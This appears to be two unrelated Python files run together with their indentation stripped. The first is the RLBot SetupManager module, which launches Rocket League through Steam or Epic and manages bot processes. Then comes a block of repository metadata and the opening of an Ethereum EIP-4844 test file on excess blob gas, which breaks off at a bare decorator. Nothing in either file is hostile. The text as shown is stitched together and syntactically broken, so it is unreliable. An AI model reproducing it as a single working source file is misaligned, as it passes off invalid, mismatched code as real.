if platform.system() == 'Windows':
import msvcrt
# By default, look for rlbot.cfg in the current working directory.
DEFAULT_RLBOT_CONFIG_LOCATION = os.path.realpath('./rlbot.cfg')
RLBOT_CONFIGURATION_HEADER = 'RLBot Configuration'
class ROCKET_LEAGUE_PROCESS_INFO:
GAMEID = 252950
PROGRAM_NAME = 'RocketLeague.exe' if platform.system() == 'Windows' else 'RocketLeague'
PROGRAM = 'RocketLeague.exe' if platform.system() == 'Windows' else 'RocketLeague'
REQUIRED_ARGS = {r'-rlbot', r'RLBot_ControllerURL=127.0.0.1:[0-9]+'}
@staticmethod
def get_ideal_args(port):
# We are specifying RLBot_PacketSendRate=240, which will override people's TARLBot.ini settings.
# We believe there is no downside to 240. See https://github.com/RLBot/RLBot/wiki/Tick-Rate
return ['-rlbot', f'RLBot_ControllerURL=127.0.0.1:{port}', 'RLBot_PacketSendRate=240', '-nomovie']
@dataclass
class RocketLeagueLauncherPreference:
STEAM = 'steam'
EPIC = 'epic' # This tries epic first, then falls back to steam. Weird name is for backwards compat.
EPIC_ONLY = 'epic_only'
preferred_launcher: str
use_login_tricks: bool
rocket_league_exe_path: Optional[Path] = None
# By default, we will attempt Epic with login tricks, then fall back to Steam.
DEFAULT_LAUNCHER_PREFERENCE = RocketLeagueLauncherPreference(RocketLeagueLauncherPreference.EPIC, True)
@contextmanager
def setup_manager_context(launcher_preference: RocketLeagueLauncherPreference = None):
"""
Creates a initialized context manager which shuts down at the end of the
`with` block.
usage:
>>> with setup_manager_context() as setup_manager:
... setup_manager.load_config(...)
... # ... Run match
"""
setup_manager = SetupManager()
setup_manager.connect_to_game(launcher_preference)
try:
yield setup_manager
except Exception as e:
get_logger(DEFAULT_LOGGER).error(e)
raise e
finally:
setup_manager.shut_down(kill_all_pids=True)
@dataclass
class BotProcessInfo:
process: mp.Process
subprocess: subprocess.Popen
player_config: PlayerConfig
def is_alive(self):
if self.process is not None:
return self.process.is_alive()
return self.subprocess.poll() is None
class SetupManager:
"""
This class is responsible for pulling together all bits of the framework to
set up a match between agents.
A normal order of methods would be:
connect_to_game()
load_config()
launch_ball_prediction()
launch_bot_processes()
start_match()
infinite_loop()
# the below two might be from another thread
reload_all_agents()
shut_down()
"""
has_started = False
num_participants = None
names = None
teams = None
python_files = None
bot_bundles: List[BotConfigBundle] = None
match_config: MatchConfig = None
extension = None
def __init__(self):
self.logger = get_logger(DEFAULT_LOGGER)
self.game_interface = GameInterface(self.logger)
self.quit_event = mp.Event()
self.helper_process_manager = HelperProcessManager(self.quit_event)
self.bot_quit_callbacks = []
self.bot_reload_requests = []
self.agent_metadata_map: Dict[int, AgentMetadata] = {}
self.match_config: MatchConfig = None
self.launcher_preference = None
self.rlbot_gateway_process = None
self.matchcomms_server: MatchcommsServerThread = None
self.early_start_seconds = 0
self.num_metadata_received = 0
self.agent_metadata_queue = mp.Queue()
self.bot_processes: Dict[int, BotProcessInfo] = {}
self.script_processes: Dict[int, subprocess.Popen] = {}
def is_rocket_league_running(self, port) -> bool:
"""
Returns whether Rocket League is running with the right port.
"""
try:
is_rocket_league_running, proc = process_configuration.is_process_running(
ROCKET_LEAGUE_PROCESS_INFO.PROGRAM,
ROCKET_LEAGUE_PROCESS_INFO.PROGRAM_NAME,
ROCKET_LEAGUE_PROCESS_INFO.REQUIRED_ARGS)
if proc is not None:
# Check for correct port.
rocket_league_port = self._read_port_from_rocket_league_args(proc.cmdline())
if rocket_league_port is not None and rocket_league_port != port:
raise Exception(f"Rocket League is already running with port {rocket_league_port} but we wanted "
f"{port}! Please close Rocket League and let us start it for you instead!")
except WrongProcessArgs:
raise Exception(f"Rocket League is not running with {ROCKET_LEAGUE_PROCESS_INFO.REQUIRED_ARGS}!\n"
"Please close Rocket League and let us start it for you instead!")
return is_rocket_league_running
def connect_to_game(self, launcher_preference: RocketLeagueLauncherPreference = None):
"""
Connects to the game by initializing self.game_interface.
"""
version.print_current_release_notes()
port = self.ensure_rlbot_gateway_started()
# Prevent loading game interface twice.
if self.has_started:
if not self.is_rocket_league_running(port):
raise Exception("Rocket League is not running even though we started it once.\n"
"Please restart RLBot.")
return
# Currently match_config is None when launching from RLBotGUI.
if self.match_config is not None and self.match_config.networking_role == 'remote_rlbot_client':
self.logger.info("Will not start Rocket League because this is configured as a client!")
# Launch the game if it is not running.
elif not self.is_rocket_league_running(port):
mergeTASystemSettings()
pref = launcher_preference or self.launcher_preference or DEFAULT_LAUNCHER_PREFERENCE
if not self.launch_rocket_league(port=port, launcher_preference=pref):
raise Exception("Failed to launch Rocket League!")
try:
self.logger.info("Loading interface...")
# We're not going to use this game_interface for much, just sending start match messages and inspecting
# the packet to see if the appropriate cars have been spawned.
self.game_interface.load_interface(
port=23234, wants_ball_predictions=False, wants_quick_chat=False, wants_game_messages=False)
except Exception as e:
self.logger.error("Terminating rlbot gateway and raising:")
self.rlbot_gateway_process.terminate()
raise e
self.has_started = True
@staticmethod
def _read_port_from_rocket_league_args(args):
for arg in args:
# The arg will look like RLBot_ControllerURL="127.0.0.1:23233"
if 'RLBot_ControllerURL' in arg:
rocket_league_port = int(arg.split(':')[1].replace('"', ''))
return int(rocket_league_port)
return None
def launch_rocket_league(self, port, launcher_preference: RocketLeagueLauncherPreference = DEFAULT_LAUNCHER_PREFERENCE) -> bool:
if launcher_preference.preferred_launcher == RocketLeagueLauncherPreference.EPIC_ONLY:
return self.launch_rocket_league_with_epic(port, launcher_preference)
elif launcher_preference.preferred_launcher == RocketLeagueLauncherPreference.STEAM:
return self.launch_rocket_league_with_steam(port)
elif launcher_preference.preferred_launcher == RocketLeagueLauncherPreference.EPIC:
# Historically, the preference of EPIC has caused RLBot to try Epic first, then Steam.
# Keeping that behavior for backwards compatibility.
epic_worked = self.launch_rocket_league_with_epic(port, launcher_preference)
if epic_worked:
return True
self.logger.info("Epic launch has failed, falling back to Steam!")
return self.launch_rocket_league_with_steam(port)
def launch_rocket_league_with_epic(self, port, launcher_preference: RocketLeagueLauncherPreference) -> bool:
"""
Launches Rocket League but does not connect to it.
"""
ideal_args = ROCKET_LEAGUE_PROCESS_INFO.get_ideal_args(port)
if launcher_preference.use_login_tricks:
if launch_with_epic_login_trick(ideal_args, launcher_preference):
return True
else:
self.logger.info("Epic login trick seems to have failed!")
if launch_with_epic_simple(ideal_args, launcher_preference):
return True
def launch_rocket_league_with_steam(self, port) -> bool:
# Try launch via Steam.
ideal_args = ROCKET_LEAGUE_PROCESS_INFO.get_ideal_args(port)
steam_exe_path = try_get_steam_executable_path()
if steam_exe_path: # Note: This Python 3.8 feature would be useful here https://www.python.org/dev/peps/pep-0572/#abstract
exe_and_args = [
str(steam_exe_path),
'-applaunch',
str(ROCKET_LEAGUE_PROCESS_INFO.GAMEID),
] + ideal_args
self.logger.info(f'Launching Rocket League with: {exe_and_args}')
_ = subprocess.Popen(exe_and_args) # This is deliberately an orphan process.
return True
self.logger.warning(f'Launching Rocket League using Steam-only fall-back launch method with args: {ideal_args}')
self.logger.info("You should see a confirmation pop-up, if you don't see it then click on Steam! "
'https://gfycat.com/AngryQuickFinnishspitz')
args_string = '%20'.join(ideal_args)
# Try launch via terminal (Linux)
if platform.system() == 'Linux':
linux_args = [
'steam',
f'steam://rungameid/{ROCKET_LEAGUE_PROCESS_INFO.GAMEID}//{args_string}'
]
try:
_ = subprocess.Popen(linux_args)
return True
except OSError:
self.logger.warning('Could not launch Steam executable on Linux.')
try:
self.logger.info("Launching rocket league via steam browser URL as a last resort...")
webbrowser.open(f'steam://rungameid/{ROCKET_LEAGUE_PROCESS_INFO.GAMEID}//{args_string}')
except webbrowser.Error:
self.logger.warning(
'Unable to launch Rocket League. Please launch Rocket League manually using the -rlbot option to continue.')
return False
return True
def load_match_config(self, match_config: MatchConfig, bot_config_overrides={}):
"""
Loads the match config into internal data structures, which prepares us to later
launch bot processes and start the match.
This is an alternative to the load_config method; they accomplish the same thing.
"""
self.num_participants = match_config.num_players
self.names = [bot.name for bot in match_config.player_configs]
self.teams = [bot.team for bot in match_config.player_configs]
for player in match_config.player_configs:
if player.bot and not player.rlbot_controlled and not player.loadout_config:
set_random_psyonix_bot_preset(player)
bundles = [bot_config_overrides[index] if index in bot_config_overrides else
get_bot_config_bundle(bot.config_path) if bot.config_path else None
for index, bot in enumerate(match_config.player_configs)]
self.python_files = [bundle.python_file if bundle else None
for bundle in bundles]
self.bot_bundles = []
for index, bot in enumerate(match_config.player_configs):
self.bot_bundles.append(bundles[index])
if bot.loadout_config is None and bundles[index]:
bot.loadout_config = bundles[index].generate_loadout_config(index, bot.team)
if match_config.extension_config is not None and match_config.extension_config.python_file_path is not None:
self.load_extension(match_config.extension_config.python_file_path)
try:
urlopen("http://google.com")
checked_environment_requirements = set()
online = True
except URLError:
self.logger.warn("The user is offline, skipping upgrade the bot requirements")
online = False
for bundle in self.bot_bundles:
if bundle is not None and bundle.use_virtual_environment:
do_post_setup = online
if do_post_setup:
if bundle.requirements_file in checked_environment_requirements:
do_post_setup = False
else:
checked_environment_requirements.add(bundle.requirements_file)
builder = EnvBuilderWithRequirements(bundle=bundle, do_post_setup=do_post_setup)
path = Path(bundle.config_directory) / 'venv'
if not path.exists():
builder.create(path)
else:
env_dir = os.path.abspath(path)
context = builder.ensure_directories(env_dir)
if not builder.upgrade:
builder.post_setup(context)
for script_config in match_config.script_configs:
script_config_bundle = get_script_config_bundle(script_config.config_path)
if script_config_bundle.use_virtual_environment:
do_post_setup = online
if do_post_setup:
if bundle.requirements_file in checked_environment_requirements:
do_post_setup = False
else:
checked_environment_requirements.add(bundle.requirements_file)
builder = EnvBuilderWithRequirements(bundle=script_config_bundle, do_post_setup=do_post_setup)
path = Path(script_config_bundle.config_directory) / 'venv'
if not path.exists():
builder.create(path)
else:
env_dir = os.path.abspath(path)
context = builder.ensure_directories(env_dir)
if not builder.upgrade:
builder.post_setup(context)
self.match_config = match_config
self.game_interface.match_config = match_config
self.game_interface.start_match_flatbuffer = match_config.create_flatbuffer()
if USE_OLD_LAUNCH:
self.start_match_configuration = match_config.create_match_settings()
self.game_interface.start_match_configuration = self.start_match_configuration
def load_config(self, framework_config: ConfigObject = None, config_location=DEFAULT_RLBOT_CONFIG_LOCATION,
bot_configs=None,
looks_configs=None):
"""
Loads the configuration into internal data structures, which prepares us to later
launch bot processes and start the match.
:param framework_config: A config object that indicates what bots to run. May come from parsing a rlbot.cfg.
:param config_location: The location of the rlbot.cfg file, which will be used to resolve relative paths.
:param bot_configs: Overrides for bot configurations.
:param looks_configs: Overrides for looks configurations.
"""
self.logger.debug('reading the configs')
# Set up RLBot.cfg
if framework_config is None:
framework_config = create_bot_config_layout()
framework_config.parse_file(config_location, max_index=MAX_PLAYERS)
if bot_configs is None:
bot_configs = {}
if looks_configs is None:
looks_configs = {}
match_config = parse_match_config(framework_config, config_location, bot_configs, looks_configs)
self.load_match_config(match_config, bot_configs)
raw_launcher_string = framework_config.get(RLBOT_CONFIGURATION_HEADER, LAUNCHER_PREFERENCE_KEY)
if raw_launcher_string == RocketLeagueLauncherPreference.STEAM:
self.launcher_preference = RocketLeagueLauncherPreference(RocketLeagueLauncherPreference.STEAM, False)
else:
self.launcher_preference = DEFAULT_LAUNCHER_PREFERENCE
def ensure_rlbot_gateway_started(self) -> int:
"""
Ensures that RLBot.exe is running. Returns the port that it will be listening on for connections from
Rocket League. Rocket League should be passed a command line argument so that it starts with this same port.
:return:
"""
# TODO: Uncomment this when done with local testing of Remote RLBot.
self.rlbot_gateway_process, port = gateway_util.find_existing_process()
if self.rlbot_gateway_process is not None:
self.logger.info(f"Already have RLBot.exe running! Port is {port}")
return port
launch_options = LaunchOptions()
if self.match_config is not None: # Currently this is None when launching from RLBotGUI.
networking_role = NetworkingRole[self.match_config.networking_role]
launch_options = LaunchOptions(
networking_role=networking_role,
remote_address=self.match_config.network_address)
self.rlbot_gateway_process, port = gateway_util.launch(launch_options)
self.logger.info(f"Python started RLBot.exe with process id {self.rlbot_gateway_process.pid} "
f"and port {port}")
return port
def launch_ball_prediction(self):
# This does nothing now. It's kept here temporarily so that RLBotGUI doesn't break.
pass
def has_received_metadata_from_all_bots(self):
expected_metadata_calls = sum(1 for player in self.match_config.player_configs if player.rlbot_controlled)
return self.num_metadata_received >= expected_metadata_calls
def launch_early_start_bot_processes(self, match_config: MatchConfig = None):
"""
Some bots can start up before the game is ready and not be bothered by missing
or strange looking values in the game tick packet, etc. Such bots can opt in to the
early start category and enjoy extra time to load up before the match starts.
WARNING: Early start is a bad idea if there's any risk that bots will not get their promised
index. This can happen with remote RLBot, etc.
"""
if self.match_config.networking_role == NetworkingRole.remote_rlbot_client:
return # The bot indices are liable to change, so don't start anything yet.
self.logger.debug("Launching early-start bot processes")
num_started = self.launch_bot_process_helper(early_starters_only=True, match_config=match_config or self.match_config)
self.try_recieve_agent_metadata()
if num_started > 0 and self.early_start_seconds > 0:
self.logger.info(f"Waiting for {self.early_start_seconds} seconds to let early-start bots load.")
end_time = datetime.now() + timedelta(seconds=self.early_start_seconds)
while datetime.now() < end_time:
self.try_recieve_agent_metadata()
time.sleep(0.1)
def launch_bot_processes(self, match_config: MatchConfig = None):
self.logger.debug("Launching bot processes")
self.launch_bot_process_helper(early_starters_only=False, match_config=match_config or self.match_config)
def launch_bot_process_helper(self, early_starters_only=False, match_config: MatchConfig = None):
# Start matchcomms here as it's only required for the bots.
if not self.matchcomms_server:
self.matchcomms_server = launch_matchcomms_server()
self.bot_processes = {ind: proc for ind, proc in self.bot_processes.items() if proc.is_alive()}
num_started = 0
# Launch processes
# TODO: this might be the right moment to fix the player indices based on a game tick packet.
if not early_starters_only:
if USE_OLD_LAUNCH:
packet = game_data_struct.GameTickPacket()
self.game_interface.update_live_data_packet(packet)
else:
packet = get_one_packet()
# TODO: root through the packet and find discrepancies in the player index mapping.
for i in range(min(self.num_participants, len(match_config.player_configs))):
player_config = match_config.player_configs[i]
if not player_config.has_bot_script():
continue
if early_starters_only and not self.bot_bundles[i].supports_early_start:
continue
spawn_id = player_config.spawn_id
if early_starters_only:
# Danger: we have low confidence in this since we're not leveraging the spawn id.
participant_index = i
else:
participant_index = None
self.logger.info(f'Player in slot {i} was sent with spawn id {spawn_id}, will search in the packet.')
num_players = packet.num_cars if USE_OLD_LAUNCH else packet.PlayersLength()
for n in range(0, num_players):
packet_spawn_id = packet.game_cars[n].spawn_id if USE_OLD_LAUNCH else packet.Players(n).SpawnId()
if spawn_id == packet_spawn_id:
self.logger.info(f'Looks good, considering participant index to be {n}')
participant_index = n
if participant_index is None:
for prox_index, proc_info in self.bot_processes.items():
if spawn_id == proc_info.player_config.spawn_id:
participant_index = prox_index
if participant_index is None:
raise Exception(f"Unable to determine the bot index for spawn id {spawn_id}")
if participant_index not in self.bot_processes:
bundle = get_bot_config_bundle(player_config.config_path)
deduped_name = str(self.match_config.player_configs[i].deduped_name)
if bundle.supports_standalone:
executable = sys.executable
if bundle.use_virtual_environment:
if platform.system() == "Windows":
executable = str(Path(bundle.config_directory) / 'venv' / 'Scripts' / 'python.exe')
else:
executable = str(Path(bundle.config_directory) / 'venv' / 'bin' / 'python')
process = subprocess.Popen([
executable,
bundle.python_file,
'--config-file', str(player_config.config_path),
'--name', deduped_name,
'--team', str(self.teams[i]),
'--player-index', str(participant_index),
'--spawn-id', str(spawn_id),
'--matchcomms-url', self.matchcomms_server.root_url.geturl()
], cwd=Path(bundle.config_directory).parent, stdin=subprocess.PIPE)
self.bot_processes[participant_index] = BotProcessInfo(process=None, subprocess=process, player_config=player_config)
# Insert immediately into the agent metadata map because the standalone process has no way to communicate it back out
self.agent_metadata_map[participant_index] = AgentMetadata(participant_index, deduped_name, self.teams[i], {process.pid})
self.num_metadata_received += 1
else:
reload_request = mp.Event()
quit_callback = mp.Event()
self.bot_reload_requests.append(reload_request)
self.bot_quit_callbacks.append(quit_callback)
process = mp.Process(target=SetupManager.run_agent,
args=(self.quit_event, quit_callback, reload_request, self.bot_bundles[i],
deduped_name,
self.teams[i], participant_index, self.python_files[i], self.agent_metadata_queue,
match_config, self.matchcomms_server.root_url, spawn_id))
process.start()
self.bot_processes[participant_index] = BotProcessInfo(process=process, subprocess=None, player_config=player_config)
num_started += 1
self.logger.info(f"Successfully started {num_started} bot processes")
process_configuration.configure_processes(self.agent_metadata_map, self.logger)
scripts_started = 0
for script_config in match_config.script_configs:
script_config_bundle = get_script_config_bundle(script_config.config_path)
if early_starters_only and not script_config_bundle.supports_early_start:
continue
executable = sys.executable
if script_config_bundle.use_virtual_environment:
if platform.system() == "Windows":
executable = str(Path(script_config_bundle.config_directory) / 'venv' / 'Scripts' / 'python.exe')
else:
executable = str(Path(script_config_bundle.config_directory) / 'venv' / 'bin' / 'python')
process = subprocess.Popen(
[
executable,
script_config_bundle.script_file,
'--matchcomms-url', self.matchcomms_server.root_url.geturl()
],
cwd=Path(script_config_bundle.config_directory).parent,
stdin=subprocess.PIPE
)
self.logger.info(f"Started script with pid {process.pid} using {process.args}")
self.script_processes[process.pid] = process
scripts_started += 1
self.logger.debug(f"Successfully started {scripts_started} scripts")
return num_started
def launch_quick_chat_manager(self):
# Quick chat manager is gone since we're using RLBot.exe now.
# Keeping this function around for backwards compatibility.
pass
def start_match(self):
if self.match_config.networking_role == NetworkingRole.remote_rlbot_client:
match_settings = self.game_interface.get_match_settings()
# TODO: merge the match settings into self.match_config
# And then make sure we still only start the appropriate bot processes
# that we originally asked for.
self.logger.info("Python attempting to start match.")
self.game_interface.start_match()
self.game_interface.wait_until_valid_packet()
self.logger.info("Match has started")
cleanUpTASystemSettings()
def infinite_loop(self):
instructions = "Press 'r' to reload all agents, or 'q' to exit"
self.logger.info(instructions)
while not self.quit_event.is_set():
# Handle commands
# TODO windows only library
if platform.system() == 'Windows':
if msvcrt.kbhit():
command = msvcrt.getwch()
if command.lower() == 'r': # r: reload
self.reload_all_agents()
elif command.lower() == 'q' or command == '\u001b': # q or ESC: quit
self.shut_down()
break
# Print instructions again if a alphabet character was pressed but no command was found
elif command.isalpha():
self.logger.info(instructions)
else:
try:
# https://python-forum.io/Thread-msvcrt-getkey-for-linux
import termios, sys
TERMIOS = termios
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
new = termios.tcgetattr(fd)
new[3] = new[3] & ~TERMIOS.ICANON & ~TERMIOS.ECHO
new[6][TERMIOS.VMIN] = 1
new[6][TERMIOS.VTIME] = 0
termios.tcsetattr(fd, TERMIOS.TCSANOW, new)
command = None
try:
command = os.read(fd, 1)
finally:
termios.tcsetattr(fd, TERMIOS.TCSAFLUSH, old)
command = command.decode("utf-8")
if command.lower() == 'r': # r: reload
self.reload_all_agents()
elif command.lower() == 'q' or command == '\u001b': # q or ESC: quit
self.shut_down()
break
# Print instructions again if a alphabet character was pressed but no command was found
elif command.isalpha():
self.logger.info(instructions)
except:
pass
self.try_recieve_agent_metadata()
def try_recieve_agent_metadata(self):
"""
Checks whether any of the started bots have posted their AgentMetadata
yet. If so, we put them on the agent_metadata_map such that we can
kill their process later when we shut_down(kill_agent_process_ids=True)
Returns how from how many bots we received metadata from.
"""
num_recieved = 0
while True: # will exit on queue.Empty
try:
single_agent_metadata: AgentMetadata = self.agent_metadata_queue.get(timeout=0.1)
num_recieved += 1
if single_agent_metadata.name not in [pc.deduped_name for pc in self.match_config.player_configs]:
self.logger.warn(f"Got agent metadata for {single_agent_metadata.name} but it shouldn't be running!")
self.helper_process_manager.start_or_update_helper_process(single_agent_metadata)
self.agent_metadata_map[single_agent_metadata.index] = single_agent_metadata
process_configuration.configure_processes(self.agent_metadata_map, self.logger)
except queue.Empty:
self.num_metadata_received += num_recieved
break
# Let's go through the agent metadata map and see if we can expand it with any child processes.
# We'll do it every time this function is called (generall periodically),
# we don't know when an agent might spawn another process.
if process_configuration.append_child_pids(self.agent_metadata_map):
process_configuration.configure_processes(self.agent_metadata_map, self.logger)
return num_recieved
def reload_all_agents(self, quiet=False):
if not quiet:
self.logger.info("Reloading all agents...")
for rr in self.bot_reload_requests:
rr.set()
def shut_down(self, time_limit=5, kill_all_pids=False, quiet=False):
if not quiet:
self.logger.info("Shutting Down")
self.quit_event.set()
end_time = datetime.now() + timedelta(seconds=time_limit)
# Don't kill RLBot.exe. It needs to keep running because if we're in a GUI
# that will persist after this shut down, the interface dll in charge of starting
# matches is already locked in to its shared memory files, and if we start a new
# RLBot.exe, those files will go stale. https://github.com/skyborgff/RLBot/issues/9
# Wait for all processes to terminate before terminating main process
terminated = False
while not terminated:
terminated = True
for callback in self.bot_quit_callbacks:
if not callback.is_set():
terminated = False
time.sleep(0.1)
if datetime.now() > end_time:
self.logger.info("Taking too long to quit, trying harder...")
break
self.kill_bot_processes()
self.kill_agent_process_ids(set(self.script_processes.keys()))
if kill_all_pids:
# The original meaning of the kill_all_pids flag only applied to bots, not scripts,
# so we are doing that separately.
self.kill_agent_process_ids(process_configuration.extract_all_pids(self.agent_metadata_map))
self.kill_matchcomms_server()
# Drain the agent_metadata_queue to make sure nothing rears its head later.
while True: # will exit on queue.Empty
try:
metadata = self.agent_metadata_queue.get(timeout=0.1)
self.logger.warn(f"Drained out metadata for {metadata.name} during shutdown!")
except queue.Empty:
break
# The quit event can only be set once. Let's reset to our initial state
self.quit_event = mp.Event()
self.helper_process_manager = HelperProcessManager(self.quit_event)
if not quiet:
self.logger.info("Shut down complete!")
def load_extension(self, extension_filename):
try:
extension_class = import_class_with_base(extension_filename, BaseExtension).get_loaded_class()
self.extension = extension_class(self)
self.game_interface.set_extension(self.extension)
except FileNotFoundError as e:
print(f'Failed to load extension: {e}')
@staticmethod
def run_agent(terminate_event, callback_event, reload_request, bundle: BotConfigBundle, name, team, index,
python_file, agent_telemetry_queue, match_config: MatchConfig, matchcomms_root: URL, spawn_id: str):
# Set the working directory to one level above the bot cfg file.
# This mimics the behavior you get when executing run.py in one of the
# example bot repositories, so bots will be more likely to 'just work'
# even if the developer is careless about file paths.
os.chdir(Path(bundle.config_directory).parent)
agent_class_wrapper = import_agent(python_file)
config_file = agent_class_wrapper.get_loaded_class().base_create_agent_configurations()
config_file.parse_file(bundle.config_obj, config_directory=bundle.config_directory)
if hasattr(agent_class_wrapper.get_loaded_class(), "run_independently"):
bm = BotManagerIndependent(terminate_event, callback_event, reload_request, config_file, name, team, index,
agent_class_wrapper, agent_telemetry_queue, match_config, matchcomms_root,
spawn_id)
else:
bm = BotManagerStruct(terminate_event, callback_event, reload_request, config_file, name, team, index,
agent_class_wrapper, agent_telemetry_queue, match_config, matchcomms_root, spawn_id)
bm.run()
def kill_bot_processes(self):
for process_info in self.bot_processes.values():
proc = process_info.process or process_info.subprocess
proc.terminate()
for process_info in self.bot_processes.values():
if process_info.process:
process_info.process.join(timeout=1)
self.bot_processes.clear()
self.num_metadata_received = 0
def send_sigterm_recursive(self, pid: int) -> List[psutil.Process]:
"""
Returns the list of processes under the pid and including the pid for further handling,
because they may become orphaned by the sigterm.
"""
all_processes = []
immediate_children = []
try:
process = psutil.Process(pid)
immediate_children = [c for c in process.children(recursive=False)]
all_processes = [process] + [c for c in process.children(recursive=True)]
process.send_signal(signal.SIGTERM)
except Exception as ex:
self.logger.debug(f"Got {ex} while sending sigterm to pid {pid}.")
for c in immediate_children:
self.send_sigterm_recursive(c.pid)
return all_processes
def kill_agent_process_ids(self, pids: Set[int]):
all_processes = []
for pid in pids:
all_processes += self.send_sigterm_recursive(pid)
time.sleep(.5)
for c in all_processes:
try:
c.kill()
except Exception as ex:
self.logger.debug(f"Got {ex} while killing pid {pid}.")
def kill_matchcomms_server(self):
if self.matchcomms_server:
self.matchcomms_server.close()
self.matchcomms_server = None
def try_get_steam_executable_path() -> Optional[Path]:
"""
Tries to find the path of the Steam executable.
Has platform specific code.
"""
try:
from winreg import OpenKey, HKEY_CURRENT_USER, ConnectRegistry, QueryValueEx, REG_SZ
except ImportError as e:
return # TODO: Linux support.
try:
key = OpenKey(ConnectRegistry(None, HKEY_CURRENT_USER), r'Software\Valve\Steam')
val, val_type = QueryValueEx(key, 'SteamExe')
except FileNotFoundError:
return
if val_type != REG_SZ:
return
return Path(val)
|
f03da7b9011f1f33e586be12be9b17a22e41fd29
|
f86035685ad272d5504ec4f5715feed428a89637
|
/src/EIPTestsFiller/Pyspecs/cancun/eip4844_blobs/test_excess_blob_gas.py
|
032ddb639fdb2520168c72758ab7c5c061ae1fcc
|
[
"MIT"
] |
permissive
|
ethereum/tests
|
fd0206671a652e1550b1f64b1b34df191570ae7a
|
9b00b68593f5869eb51a6659e1cc983e875e616b
|
refs/heads/develop
| 2023-08-30T14:33:54.326595
| 2023-08-18T00:00:33
| 2023-08-19T13:03:12
| 15,540,967
| 507
| 338
|
MIT
| 2023-09-14T02:12:16
| 2013-12-31T02:09:03
|
Python
|
UTF-8
|
Python
| false
| false
| 22,487
|
py
|
test_excess_blob_gas.py
|
"""
abstract: Tests `excessBlobGas` and `blobGasUsed` block fields for [EIP-4844: Shard Blob Transactions](https://eips.ethereum.org/EIPS/eip-4844)
Test `excessBlobGas` and `blobGasUsed` block fields for [EIP-4844: Shard Blob Transactions](https://eips.ethereum.org/EIPS/eip-4844).
note: Adding a new test
Add a function that is named `test_<test_name>` and takes at least the following arguments:
- blockchain_test
- env
- pre
- blocks
- post
- correct_excess_blob_gas
The following arguments *need* to be parametrized or the test will not be generated:
- new_blobs
All other `pytest.fixture` fixtures can be parametrized to generate new combinations and test
cases.
""" # noqa: E501
import itertools
from typing import Iterator, List, Mapping, Optional, Tuple
import pytest
from ethereum_test_tools import (
Account,
Block,
BlockchainTestFiller,
Environment,
Header,
TestAddress,
TestAddress2,
Transaction,
add_kzg_version,
to_address,
to_hash_bytes,
)
from .spec import Spec, SpecHelpers, ref_spec_4844
REFERENCE_SPEC_GIT_PATH = ref_spec_4844.git_path
REFERENCE_SPEC_VERSION = ref_spec_4844.version
# All tests run from Cancun fork
pytestmark = pytest.mark.valid_from("Cancun")
@pytest.fixture
def parent_excess_blobs() -> int: # noqa: D103
"""
By default we start with an intermediate value between the target and max.
"""
return (SpecHelpers.max_blobs_per_block() + SpecHelpers.target_blobs_per_block()) // 2 + 1
@pytest.fixture
def parent_excess_blob_gas(parent_excess_blobs: int) -> int: # noqa: D103
return parent_excess_blobs * Spec.GAS_PER_BLOB
@pytest.fixture
def correct_excess_blob_gas( # noqa: D103
parent_excess_blob_gas: int,
parent_blobs: int,
) -> int:
return SpecHelpers.calc_excess_blob_gas_from_blob_count(
parent_excess_blob_gas=parent_excess_blob_gas,
parent_blob_count=parent_blobs,
)
@pytest.fixture
def header_excess_blobs_delta() -> Optional[int]: # noqa: D103
return None
@pytest.fixture
def header_excess_blob_gas_delta() -> Optional[int]: # noqa: D103
return None
@pytest.fixture
def header_excess_blob_gas( # noqa: D103
correct_excess_blob_gas: int,
header_excess_blobs_delta: Optional[int],
header_excess_blob_gas_delta: Optional[int],
) -> Optional[int]:
if header_excess_blobs_delta is not None:
modified_excess_blob_gas = correct_excess_blob_gas + (
header_excess_blobs_delta * Spec.GAS_PER_BLOB
)
if modified_excess_blob_gas < 0:
modified_excess_blob_gas = 2**64 + (modified_excess_blob_gas)
return modified_excess_blob_gas
if header_excess_blob_gas_delta is not None:
return correct_excess_blob_gas + header_excess_blob_gas_delta
return None
@pytest.fixture
def block_fee_per_blob_gas( # noqa: D103
correct_excess_blob_gas: int,
) -> int:
return Spec.get_blob_gasprice(excess_blob_gas=correct_excess_blob_gas)
@pytest.fixture
def block_base_fee() -> int: # noqa: D103
return 7
@pytest.fixture
def env( # noqa: D103
parent_excess_blob_gas: int,
block_base_fee: int,
parent_blobs: int,
) -> Environment:
return Environment(
excess_blob_gas=parent_excess_blob_gas
if parent_blobs == 0
else parent_excess_blob_gas + Spec.TARGET_BLOB_GAS_PER_BLOCK,
base_fee=block_base_fee,
)
@pytest.fixture
def tx_max_fee_per_gas( # noqa: D103
block_base_fee: int,
) -> int:
return block_base_fee
@pytest.fixture
def tx_max_fee_per_blob_gas( # noqa: D103
block_fee_per_blob_gas: int,
) -> int:
return block_fee_per_blob_gas
@pytest.fixture
def tx_data_cost( # noqa: D103
tx_max_fee_per_blob_gas: int,
new_blobs: int,
) -> int:
return tx_max_fee_per_blob_gas * Spec.GAS_PER_BLOB * new_blobs
@pytest.fixture
def tx_value() -> int: # noqa: D103
return 1
@pytest.fixture
def tx_exact_cost(tx_value: int, tx_max_fee_per_gas: int, tx_data_cost: int) -> int: # noqa: D103
tx_gas = 21000
return (tx_gas * tx_max_fee_per_gas) + tx_value + tx_data_cost
@pytest.fixture
def pre(tx_exact_cost: int) -> Mapping[str, Account]: # noqa: D103
return {
TestAddress: Account(balance=tx_exact_cost),
TestAddress2: Account(balance=10**40),
}
@pytest.fixture
def destination_account() -> str: # noqa: D103
return to_address(0x100)
@pytest.fixture
def post(destination_account: str, tx_value: int) -> Mapping[str, Account]: # noqa: D103
return {
destination_account: Account(balance=tx_value),
}
@pytest.fixture
def tx( # noqa: D103
new_blobs: int,
tx_max_fee_per_gas: int,
tx_max_fee_per_blob_gas: int,
destination_account: str,
):
if new_blobs == 0:
# Send a normal type two tx instead
return Transaction(
ty=2,
nonce=0,
to=destination_account,
value=1,
gas_limit=21000,
max_fee_per_gas=tx_max_fee_per_gas,
max_priority_fee_per_gas=0,
access_list=[],
)
else:
return Transaction(
ty=Spec.BLOB_TX_TYPE,
nonce=0,
to=destination_account,
value=1,
gas_limit=21000,
max_fee_per_gas=tx_max_fee_per_gas,
max_priority_fee_per_gas=0,
max_fee_per_blob_gas=tx_max_fee_per_blob_gas,
access_list=[],
blob_versioned_hashes=add_kzg_version(
[to_hash_bytes(x) for x in range(new_blobs)],
Spec.BLOB_COMMITMENT_VERSION_KZG,
),
)
@pytest.fixture
